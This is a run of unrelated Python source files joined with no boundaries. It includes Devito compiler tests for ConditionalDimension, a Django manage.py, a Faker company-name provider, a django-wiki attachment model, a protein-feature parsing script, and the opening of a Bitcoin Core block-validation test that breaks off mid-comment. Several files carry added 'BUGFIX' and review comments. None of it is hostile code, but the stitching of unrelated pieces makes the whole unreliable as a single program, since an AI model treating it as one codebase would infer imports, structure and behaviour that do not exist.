        # Guard: keep incrementing only while below the threshold
        cond = ConditionalDimension(name='cond',
                                    parent=time, condition=f[time] < stop_value)

        eqs = [Eq(f.forward, f), Eq(f.forward, f.forward + 1, implicit_dims=[cond])]
        Operator(eqs).apply(time_M=shape[0] - 2)

        # Reference result computed in pure Python: i capped at stop_value
        expected = np.array([min(i, stop_value) for i in range(shape[0])],
                            dtype=np.float64)
        assert np.all(f.data == expected)

    def test_grouping(self):
        """
        Check that Clusters guarded by the same set of ConditionalDimensions
        end up inside a single Conditional (follow up to issue #1610).
        """
        grid = Grid(shape=(10, 10))
        tdim = grid.time_dim
        cond = ConditionalDimension(name='cond', parent=tdim, condition=tdim < 5)

        u = TimeFunction(name='u', grid=grid, space_order=4)

        # The SubDomain serves only to keep the two Eqs in separate Clusters
        eqns = [Eq(u.forward, u + 1, subdomain=grid.interior),
                Eq(u.forward, u.dx.dx + 1., implicit_dims=[cond])]

        op = Operator(eqns, opt=('advanced-fsg', {'cire-mincost-sops': 1}))

        # Exactly one Conditional, with both iteration trees inside it
        conditionals = FindNodes(Conditional).visit(op)
        assert len(conditionals) == 1
        assert len(retrieve_iteration_tree(conditionals[0].then_body)) == 2

    def test_stepping_dim_in_condition_lowering(self):
        """
        Check that the compiler performs lowering on conditions
        with TimeDimensions and generates the expected code::

        if (g[t][x + 1][y + 1] <= 10){          if (g[t0][x + 1][y + 1] <= 10){
            ...                          -->       ...
        }                                       }

        This test increments a function by one at every timestep until it is
        less-or-equal to 10 (g<=10), although the operator runs for 13 timesteps.
        """
        grid = Grid(shape=(4, 4))
        _, y = grid.dimensions

        ths = 10
        g = TimeFunction(name='g', grid=grid)

        ci = ConditionalDimension(name='ci', parent=y, condition=Le(g, ths))

        op = Operator(Eq(g.forward, g + 1, implicit_dims=ci))

        op.apply(time_M=ths+3)
        assert np.all(g.data[0, :, :] == ths)
        assert np.all(g.data[1, :, :] == ths + 1)
        # BUGFIX: this used to be two separate statements -- `assert '<literal>'`
        # (always truthy, so it never failed) followed by a dead string
        # expression carrying the `in str(op.ccode)` check. Assert the actual
        # lowering (stepping `t` -> modulo `t0`) in the generated condition.
        assert 'if (g[t0][x + 1][y + 1] <= 10)' in str(op.ccode)

    def test_expr_like_lowering(self):
        """
        Check that an expr-like condition of a ConditionalDimension is
        indexified and lowered by the Operator.
        """
        grid = Grid(shape=(3, 3))
        g1 = Function(name='g1', grid=grid)
        g2 = Function(name='g2', grid=grid)

        for func in (g1, g2):
            func.data[:] = 0.49
        x, y = grid.dimensions
        # Condition holds everywhere, since s < 1.01*s for the positive data
        ci = ConditionalDimension(name='ci', parent=y, condition=Le((g1 + g2),
                                  1.01*(g1 + g2)))

        f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
        op = Operator(Eq(f, g1+g2))
        op.apply()

        assert np.all(f.data[:] == g1.data[:] + g2.data[:])

    @pytest.mark.parametrize('setup_rel, rhs, c1, c2, c3, c4', [
        # Relation, RHS, c1 to c4 used as indexes in assert
        (Lt, 3, 2, 4, 4, -1), (Le, 2, 2, 4, 4, -1), (Ge, 3, 4, 6, 1, 4),
        (Gt, 2, 4, 6, 1, 4), (Ne, 5, 2, 6, 1, 2)
    ])
    def test_relational_classes(self, setup_rel, rhs, c1, c2, c3, c4):
        """
        Test ConditionalDimension using conditions based on Relations over SubDomains.
        """

        # 8x8 grid whose 'inner' SubDomain excludes a 2-point border on each side
        class InnerDomain(SubDomain):
            name = 'inner'

            def define(self, dimensions):
                return {d: ('middle', 2, 2) for d in dimensions}

        inner_domain = InnerDomain()
        grid = Grid(shape=(8, 8), subdomains=(inner_domain,))
        g = Function(name='g', grid=grid)
        g2 = Function(name='g2', grid=grid)

        # Fill the four 4x4 quadrants of g and g2 with the constants 1..4
        for i in [g, g2]:
            i.data[:4, :4] = 1
            i.data[4:, :4] = 2
            i.data[4:, 4:] = 3
            i.data[:4, 4:] = 4

        xi, yi = grid.subdomains['inner'].dimensions

        # Condition compares a weighted blend of g and g2 against `rhs`
        cond = setup_rel(0.25*g + 0.75*g2, rhs, subdomain=grid.subdomains['inner'])
        ci = ConditionalDimension(name='ci', parent=yi, condition=cond)
        # `f` is defined over `ci`, so writes to it occur only where `cond` holds
        f = Function(name='f', shape=grid.shape, dimensions=(xi, ci))

        eq1 = Eq(f, 0.4*g + 0.6*g2)
        eq2 = Eq(f, 5)

        Operator([eq1, eq2]).apply()
        assert np.all(f.data[2:6, c1:c2] == 5.)
        assert np.all(f.data[:, c3:c4] < 5.)

    def test_from_cond_to_param(self):
        """
        Test that Functions appearing in the condition of a ConditionalDimension
        but not explicitly in an Eq are actually part of the Operator input
        (stems from issue #1298).
        """
        grid = Grid(shape=(8, 8))
        x, y = grid.dimensions

        # `g` and `h` appear only inside `ci`'s condition, never in an Eq
        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)
        ci = ConditionalDimension(name='ci', parent=y, condition=Lt(g, 2 + h))
        f = Function(name='f', shape=grid.shape, dimensions=(x, ci))

        for _ in range(5):
            # issue #1298 was non deterministic
            Operator(Eq(f, 5)).apply()

    @skipif('device')
    def test_no_fusion_simple(self):
        """
        If ConditionalDimensions are present, then Clusters must not be fused so
        that ultimately Eqs get scheduled to different loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid)
        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)

        # No ConditionalDimensions yet. Will be fused and optimized
        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1)]

        op = Operator(eqns)

        # All four Expressions share one loop nest ('bf0'), the last three
        # reusing the temporary produced by the first
        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 4
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output
        assert exprs[3].expr.rhs is exprs[0].output

        # Now with a ConditionalDimension. No fusion, no optimization
        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1, implicit_dims=[ctime])]

        op = Operator(eqns)
        # The guarded Eq is split off into a second elemental function ('bf1')
        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output
        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 1

    @skipif('device')
    def test_no_fusion_convoluted(self):
        """
        Conceptually like `test_no_fusion_simple`, but with more expressions
        and non-trivial data flow.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid)
        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        # Guarded Eqs interleaved with unguarded ones sharing the same data
        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1, implicit_dims=[ctime]),
                Eq(f.forward, f + 1, implicit_dims=[ctime]),
                Eq(f.forward, f + 1),
                Eq(g, f + 1)]

        op = Operator(eqns)

        # Expect three loop nests: unguarded head, guarded middle, unguarded tail
        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output

        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3

        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output

    def test_affiness(self):
        """
        Check that time-subsampling via ConditionalDimension does not break
        the affineness of the space Iterations (issue #1616).
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)

        u = TimeFunction(name='u', grid=grid)
        nsave = (nt + factor - 1) // factor
        usave = TimeFunction(name='usave', grid=grid, save=nsave,
                             time_dim=time_subsampled)

        op = Operator([Eq(u.forward, u + 1.), Eq(usave, u)])

        # Every Iteration other than the time loop must be affine
        for iteration in FindNodes(Iteration).visit(op):
            if iteration.dim is not time:
                assert iteration.is_Affine


class TestMashup(object):

    """
    Check the correct functioning of the compiler in presence of many Dimension types.
    """

    def test_topofusion_w_subdims_conddims(self):
        """
        Check that topological fusion works across guarded Clusters over different
        iteration spaces and in presence of anti-dependences.

        This test uses both SubDimensions (via SubDomains) and ConditionalDimensions.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        # Two guarded Eqs (fsave, gsave) interleaved with a SubDomain Eq (h)
        eqns = [Eq(f.forward, f + 1),
                Eq(g.forward, g + 1),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 3

        # First nest: the unguarded updates of f and g
        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 2
        assert exprs[0].write is f
        assert exprs[1].write is g

        # Second nest: both guarded snapshot Eqs fused together
        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3
        assert exprs[1].write is fsave
        assert exprs[2].write is gsave

        # Third nest: the SubDomain Eq on its own
        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 1
        assert exprs[0].write is h

    def test_topofusion_w_subdims_conddims_v2(self):
        """
        Like `test_topofusion_w_subdims_conddims` but with more SubDomains,
        so we expect fewer loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        # Unlike v1, the f and g updates now also live on the interior SubDomain,
        # so they can share a nest with the h equation
        eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
                Eq(g.forward, g + 1, subdomain=grid.interior),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 2
        assert len(FindNodes(Expression).visit(op._func_table['bf0'].root)) == 3
        assert len(FindNodes(Expression).visit(op._func_table['bf1'].root)) == 2 + 1  # r0

    def test_topofusion_w_subdims_conddims_v3(self):
        """
        Like `test_topofusion_w_subdims_conddims_v2` but with an extra anti-dependence,
        which causes scheduling over more loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        # `f.dt2.dx` in the h equation introduces the extra anti-dependence on f
        eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
                Eq(g.forward, g + 1, subdomain=grid.interior),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f.dt2.dx + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 3

        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 2
        assert exprs[0].write is f
        assert exprs[1].write is g

        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3
        assert exprs[1].write is fsave
        assert exprs[2].write is gsave

        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 2
        assert exprs[1].write is h

"""Kytos SDN Platform."""
from pkgutil import extend_path

__path__ = extend_path(__path__, __name__)

#!/usr/bin/env python
# Django command-line entry point (the standard `manage.py` boilerplate)
# for the `pigame` project.
import os
import sys

if __name__ == "__main__":
    # Point Django at this project's settings unless already configured
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pigame.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    # Dispatch to the requested management command (runserver, migrate, ...)
    execute_from_command_line(sys.argv)

from .. import Provider as CompanyProvider


class Provider(CompanyProvider):
    """Faker company provider with Azerbaijani company names."""

    # Templates used by company(); {{large_company}} draws from the
    # fixed list below
    formats = (
        "{{last_name}} {{company_suffix}}",
        "{{last_name}} {{last_name}} {{company_suffix}}",
        "{{large_company}}",
    )

    # Real company names, returned verbatim by large_company()
    large_companies = (
        "AZAL",
        "Azergold",
        "SOCAR",
        "Socar Polymer",
        "Global Export Fruits",
        "Baku Steel Company",
        "Azersun",
        "Sun Food",
        "Azərbaycan Şəkər İstehsalat Birliyi",
        "Azərsu",
        "Xəzər Dəniz Gəmiçiliyi",
        "Azərenerji",
        "Bakıelektrikşəbəkə",
        "Azəralüminium",
        "Bravo",
        "Azərpambıq Aqrar Sənaye Kompleksi",
        "CTS-Agro",
        "Azərtütün Aqrar Sənaye Kompleksi",
        "Azəripək",
        "Azfruittrade",
        "AF Holding",
        "Azinko Holding",
        "Gilan Holding",
        "Azpetrol",
        "Azərtexnolayn",
        "Bakı Gəmiqayırma Zavodu",
        "Gəncə Tekstil Fabriki",
        "Mətanət A",
        "İrşad Electronics",
    )
    # Company legal-form suffixes
    company_suffixes = (
        "ASC",
        "QSC",
        "MMC",
    )

    def large_company(self):
        """
        Return a random name from the fixed ``large_companies`` list.

        :example: 'SOCAR'
        """
        return self.random_element(self.large_companies)

# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Handles backports of the standard library's `fractions.py`.

The fractions module in 2.6 does not handle being instantiated using a
float and then calculating an approximate fraction based on that.
This functionality is required by the FITS unit format generator,
since the FITS unit format handles only rational, not decimal point,
powers.
"""

from __future__ import absolute_import

import sys
# On Python 2.6 re-export the bundled backport; on every other version the
# stdlib `fractions` module already provides the required behaviour.
if sys.version_info[:2] == (2, 6):
    from ._fractions_py2 import *
else:
    from fractions import *

# -*- coding: utf-8 -*-
import os.path
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as django_settings
from django.db.models import signals
from know.plugins.attachments import settings
from know import managers
from know.models.pluginbase import ReusablePlugin
from know.models.article import BaseRevisionMixin


class IllegalFileExtension(Exception):
    """Raised when an uploaded file's extension is not allowed."""


class Attachment(ReusablePlugin):
    """A file attached to an article, pointing at its currently-used revision."""

    objects = managers.ArticleFkManager()

    # The revision currently in use; null until a first revision is saved
    current_revision = models.OneToOneField(
        'AttachmentRevision',
        verbose_name=_(u'current revision'),
        blank=True,
        null=True,
        related_name='current_set',
        help_text=_(u'The revision of this attachment currently in use (on all articles using the attachment)'),
    )

    # Filename as originally uploaded; shown to users instead of storage names
    original_filename = models.CharField(
        max_length=256,
        verbose_name=_(u'original filename'),
        blank=True,
        null=True,
    )

    def can_write(self, **kwargs):
        """Deny anonymous users unless settings.ANONYMOUS allows them,
        then defer to the parent plugin's permission check."""
        user = kwargs.get('user', None)
        if not settings.ANONYMOUS and (not user or user.is_anonymous()):
            return False
        return ReusablePlugin.can_write(self, **kwargs)

    def can_delete(self, user):
        # Deleting is permitted exactly when writing is
        return self.can_write(user=user)

    class Meta:
        verbose_name = _(u'attachment')
        verbose_name_plural = _(u'attachments')
        app_label = settings.APP_LABEL

    def __unicode__(self):
        return "%s: %s" % (self.article.current_revision.title, self.original_filename)


def extension_allowed(filename):
    """Return `filename`'s extension if it is allowed, else raise.

    Raises IllegalFileExtension when the filename has no extension at all,
    or when the extension is not (case-insensitively) listed in
    settings.FILE_EXTENSIONS.
    """
    # BUGFIX: `filename.split(".")[-1]` can never raise IndexError, because
    # str.split always returns at least one element -- the old
    # `except IndexError` branch was dead code and the intended "no
    # extension" error never fired. Detect the condition explicitly.
    if "." not in filename:
        # No extension
        raise IllegalFileExtension("No file extension found in filename. That's not okay!")
    extension = filename.split(".")[-1]
    if not extension.lower() in map(lambda x: x.lower(), settings.FILE_EXTENSIONS):
        raise IllegalFileExtension("The following filename is illegal: %s. Extension has to be one of %s" %
                                   (filename, ", ".join(settings.FILE_EXTENSIONS)))

    return extension


def upload_path(instance, filename):
    """Compute the storage path for an AttachmentRevision's uploaded file.

    Builds settings.UPLOAD_PATH with '%aid' replaced by the owning article's
    id, optionally adds a random md5-hexdigest directory, and optionally
    appends '.upload' to the filename. Also validates the file extension.
    """
    from os import path

    extension = extension_allowed(filename)

    # Has to match original extension filename
    if instance.id and instance.attachment and instance.attachment.original_filename:
        original_extension = instance.attachment.original_filename.split(".")[-1]
        # NOTE(review): `extension` is lowercased but `original_extension` is
        # not -- an originally uppercase extension (e.g. "JPG") would always
        # fail this comparison; confirm whether that is intended.
        if not extension.lower() == original_extension:
            raise IllegalFileExtension("File extension has to be '%s', not '%s'." %
                                       (original_extension, extension.lower()))
    elif instance.attachment:
        # First upload: remember the user's original filename
        instance.attachment.original_filename = filename

    upload_path = settings.UPLOAD_PATH
    upload_path = upload_path.replace('%aid', str(instance.attachment.article.id))
    if settings.UPLOAD_PATH_OBSCURIFY:
        import random
        import hashlib
        # Obscure the directory with a random 32-char md5 hexdigest
        # (note: `random`, not a cryptographic source)
        m = hashlib.md5(str(random.randint(0, 100000000000000)))
        upload_path = path.join(upload_path, m.hexdigest())

    if settings.APPEND_EXTENSION:
        filename += '.upload'
    return path.join(upload_path, filename)


class AttachmentRevision(BaseRevisionMixin, models.Model):
    """A single version of an Attachment's uploaded file."""

    attachment = models.ForeignKey('Attachment')

    file = models.FileField(
        upload_to=upload_path,
        max_length=255,
        verbose_name=_(u'file'),
        storage=settings.STORAGE_BACKEND,
    )

    description = models.TextField(
        blank=True,
    )

    class Meta:
        verbose_name = _(u'attachment revision')
        verbose_name_plural = _(u'attachment revisions')
        ordering = ('created',)
        get_latest_by = ('revision_number',)
        app_label = settings.APP_LABEL

    def get_filename(self):
        """Used to retrieve the filename of a revision.
        But attachment.original_filename should always be used in the frontend
        such that filenames stay consistent."""
        # TODO: Perhaps we can let file names change when files are replaced?
        if not self.file:
            return None
        filename = self.file.name.split("/")[-1]
        return ".".join(filename.split(".")[:-1])

    def get_size(self):
        """Used to retrieve the file size and not cause exceptions."""
        try:
            return self.file.size
        except (OSError, ValueError):
            return None

    def save(self, *args, **kwargs):
        """Link to the previous head revision, auto-number the revision, and
        promote this revision to current if the attachment has none yet."""
        if (not self.id and
            not self.previous_revision and
            self.attachment and
            self.attachment.current_revision and
            self.attachment.current_revision != self):

            self.previous_revision = self.attachment.current_revision

        if not self.revision_number:
            try:
                previous_revision = self.attachment.attachmentrevision_set.latest()
                self.revision_number = previous_revision.revision_number + 1
            # NB! The above should not raise the below exception, but somehow it does.
            # BUGFIX: the old Python 2 form `except A, B:` caught only
            # AttachmentRevision.DoesNotExist and *rebound* the caught
            # exception object to the name `Attachment.DoesNotExist`;
            # a tuple of both exception types was intended.
            except (AttachmentRevision.DoesNotExist, Attachment.DoesNotExist):
                self.revision_number = 1

        super(AttachmentRevision, self).save(*args, **kwargs)

        if not self.attachment.current_revision:
            # If I'm saved from Django admin, then article.current_revision is me!
            self.attachment.current_revision = self
            self.attachment.save()

    def __unicode__(self):
        return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
                                 self.attachment.original_filename,
                                 self.revision_number)


def on_revision_delete(instance, *args, **kwargs):
    """pre_delete handler: delete the revision's file from storage and prune
    upload directories left empty (one or two levels, depending on whether
    the path was obscurified)."""
    if not instance.file:
        return

    # Remove file
    path = instance.file.path.split("/")[:-1]
    instance.file.delete(save=False)

    # Clean up empty directories

    # Check for empty folders in the path. Delete the first two.
    if len(path[-1]) == 32:
        # Path was (most likely) obscurified (32-char md5 hexdigest directory)
        # so we should look 2 levels down
        max_depth = 2
    else:
        max_depth = 1
    for depth in range(0, max_depth):
        # depth 0 -> the leaf directory itself; depth 1 -> its parent
        delete_path = "/".join(path[:-depth] if depth > 0 else path)
        # NOTE(review): listdir joins with MEDIA_ROOT while rmdir uses
        # `delete_path` directly. `instance.file.path` appears to already be
        # absolute (so os.path.join would collapse to it), but confirm the
        # two calls really target the same directory.
        try:
            if len(os.listdir(os.path.join(django_settings.MEDIA_ROOT, delete_path))) == 0:
                os.rmdir(delete_path)
        except OSError:
            # Raised by os.listdir if directory is missing
            pass

# Remove the stored file (and prune empty upload directories) whenever an
# AttachmentRevision row is deleted.
signals.pre_delete.connect(on_revision_delete, AttachmentRevision)

# reads uniprot core file and generates core features
from features_helpers import score_differences


def build_uniprot_to_index_to_core(sable_db_obj):
    """Parse a SABLE DB file into {protein_id: {residue_index: core_label}}.

    Each parseable line must have at least three whitespace-separated
    tokens: protein id, integer index, core label. Lines whose index is not
    an integer are reported and skipped.

    NOTE(review): Python 2 only (`dict.has_key`, `print` statement).
    """
    uniprot_to_index_to_core = {}
    for line in sable_db_obj:
        tokens = line.split()
        try:
            # PARSING ID
            prot = tokens[0]
            index = int(tokens[1])
            core = tokens[2]
            # PARSING ID
            if uniprot_to_index_to_core.has_key(prot):
                uniprot_to_index_to_core[prot][index] = core
            else:
                uniprot_to_index_to_core[prot] = {index: core}
        except ValueError:
            # int() failed -- report the offending line (minus its newline)
            print "Cannot parse: " + line[0:len(line) - 1]
    return uniprot_to_index_to_core


def get_sable_scores(map_file, f_sable_db_location, uniprot_core_output_location):
    """For each mapping line, compute core-difference scores over three
    regions (sstart-start, start-end, end-eend) plus the whole canonical
    protein, and write one tab-separated row per input line.

    NOTE(review): Python 2 only (`print >>` syntax). The two input file
    objects are never closed; only the output file is.
    """
    map_file_obj = open(map_file, 'r')
    sable_db_obj = open(f_sable_db_location, 'r')
    write_to = open(uniprot_core_output_location, 'w')

    uniprot_to_index_to_core = build_uniprot_to_index_to_core(sable_db_obj)

    for line in map_file_obj:
        tokens = line.split()

        # Columns: composite id, protein id, then four integer coordinates
        asid = tokens[0].split("_")[0]
        prot = tokens[1]
        sstart = int(tokens[2])
        start = int(tokens[3])
        end = int(tokens[4])
        eend = int(tokens[5])

        # Rough length derived from the id's trailing "...=<n>" field (n/3);
        # NOTE(review): computed but never used below -- dead code?
        rough_a_length = int(int(tokens[0].split("_")[-1].split("=")[1]) / 3)
        if asid[0] == "I":
            rough_a_length = 0

        # Defaults when the protein is absent from the SABLE DB
        c1_count = 0
        a_count = 0
        c2_count = 0
        canonical_absolute = 0

        if prot in uniprot_to_index_to_core:
            c1_count = score_differences(uniprot_to_index_to_core, prot, sstart, start)
            a_count = score_differences(uniprot_to_index_to_core, prot, start, end)
            c2_count = score_differences(uniprot_to_index_to_core, prot, end, eend)
            # Column 8 of the tab-split line holds the canonical protein length
            prot_len = int(line.split("\t")[7].strip())
            canonical_absolute = score_differences(uniprot_to_index_to_core, prot, 1, prot_len)

        print >> write_to, tokens[0] + "\t" + prot + "\t" + repr(c1_count) + "\t" + repr(a_count) + "\t" + repr(
            c2_count) + "\t" + repr(canonical_absolute)
    write_to.close()
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
import struct
import time

from test_framework.blocktools import create_block, create_coinbase, create_tx_with_script, get_legacy_sigopcount_block
from test_framework.key import CECKey
from test_framework.messages import (
    CBlock,
    COIN,
    COutPoint,
    CTransaction,
    CTxIn,
    CTxOut,
    MAX_BLOCK_BASE_SIZE,
    uint256_from_compact,
    uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
    CScript,
    MAX_SCRIPT_ELEMENT_SIZE,
    OP_2DUP,
    OP_CHECKMULTISIG,
    OP_CHECKMULTISIGVERIFY,
    OP_CHECKSIG,
    OP_CHECKSIGVERIFY,
    OP_ELSE,
    OP_ENDIF,
    OP_EQUAL,
    OP_DROP,
    OP_FALSE,
    OP_HASH160,
    OP_IF,
    OP_INVALIDOPCODE,
    OP_RETURN,
    OP_TRUE,
    SIGHASH_ALL,
    SignatureHash,
    hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal

# Maximum number of signature-check operations allowed in a block
MAX_BLOCK_SIGOPS = 20000

#  Use this class for tests that require behavior other than normal "mininode" behavior.
#  For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
    """A CBlock whose serialization deliberately bloats the tx-count varint."""

    def initialize(self, base_block):
        # Take over the base block's transactions and recompute the merkle root
        self.vtx = copy.deepcopy(base_block.vtx)
        self.hashMerkleRoot = self.calc_merkle_root()

    def serialize(self, with_witness=False):
        # Header fields first: bypass CBlock's own serialize by starting the
        # MRO lookup *after* CBlock (same trick as the original code)
        parts = [super(CBlock, self).serialize()]
        # Encode len(vtx) as a bloated 9-byte varint: 0xff marker + uint64
        parts.append(struct.pack("<BQ", 255, len(self.vtx)))
        for tx in self.vtx:
            if with_witness:
                parts.append(tx.serialize_with_witness())
            else:
                parts.append(tx.serialize_without_witness())
        return b"".join(parts)

    def normal_serialize(self):
        # Standard (non-bloated) serialization, for comparison in tests
        return super().serialize()

class FullBlockTest(BitcoinTestFramework):
    def set_test_params(self):
        """Configure the framework: one node, started from a fresh chain."""
        self.setup_clean_chain = True  # start at genesis, no cached chain
        self.num_nodes = 1
        self.extra_args = [[]]  # no extra command-line arguments for the node

    def run_test(self):
        node = self.nodes[0]  # convenience reference to the node

        self.bootstrap_p2p()  # Add one p2p connection to the node

        self.block_heights = {}
        self.coinbase_key = CECKey()
        self.coinbase_key.set_secretbytes(b"horsebattery")
        self.coinbase_pubkey = self.coinbase_key.get_pubkey()
        self.tip = None
        self.blocks = {}
        self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
        self.block_heights[self.genesis_hash] = 0
        self.spendable_outputs = []

        # Create a new block
        b0 = self.next_block(0)
        self.save_spendable_output()
        self.sync_blocks([b0])

        # Allow the block to mature
        blocks = []
        for i in range(99):
            blocks.append(self.next_block(5000 + i))
            self.save_spendable_output()
        self.sync_blocks(blocks)

        # collect spendable outputs now to avoid cluttering the code later on
        out = []
        for i in range(33):
            out.append(self.get_spendable_output())

        # Start by building a couple of blocks on top (which output is spent is
        # in parentheses):
        #     genesis -> b1 (0) -> b2 (1)
        b1 = self.next_block(1, spend=out[0])
        self.save_spendable_output()

        b2 = self.next_block(2, spend=out[1])
        self.save_spendable_output()

        self.sync_blocks([b1, b2])

        # Fork like this:
        #
        #     genesis -> b1 (0) -> b2 (1)
        #                      \-> b3 (1)
        #
        # Nothing should happen at this point. We saw b2 first so it takes priority.
        self.log.info("Don't reorg to a chain of the same length")
        self.move_tip(1)
        b3 = self.next_block(3, spend=out[1])
        txout_b3 = b3.vtx[1]
        self.sync_blocks([b3], False)

        # Now we add another block to make the alternative chain longer.
        #
        #     genesis -> b1 (0) -> b2 (1)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reorg to a longer chain")
        b4 = self.next_block(4, spend=out[2])
        self.sync_blocks([b4])

        # ... and back to the first chain.
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                      \-> b3 (1) -> b4 (2)
        self.move_tip(2)
        b5 = self.next_block(5, spend=out[2])
        self.save_spendable_output()
        self.sync_blocks([b5], False)

        self.log.info("Reorg back to the original chain")
        b6 = self.next_block(6, spend=out[3])
        self.sync_blocks([b6], True)

        # Try to create a fork that double-spends
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                                          \-> b7 (2) -> b8 (4)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a chain with a double spend, even if it is longer")
        self.move_tip(5)
        b7 = self.next_block(7, spend=out[2])
        self.sync_blocks([b7], False)

        b8 = self.next_block(8, spend=out[4])
        self.sync_blocks([b8], False, reconnect=True)

        # Try to create a block that has too much fee
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                                                    \-> b9 (4)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block where the miner creates too much coinbase reward")
        self.move_tip(6)
        b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
        self.sync_blocks([b9], False, 16, b'bad-cb-amount', reconnect=True)

        # Create a fork that ends in a block with too much fee (the one that causes the reorg)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b10 (3) -> b11 (4)
        #                      \-> b3 (1) -> b4 (2)
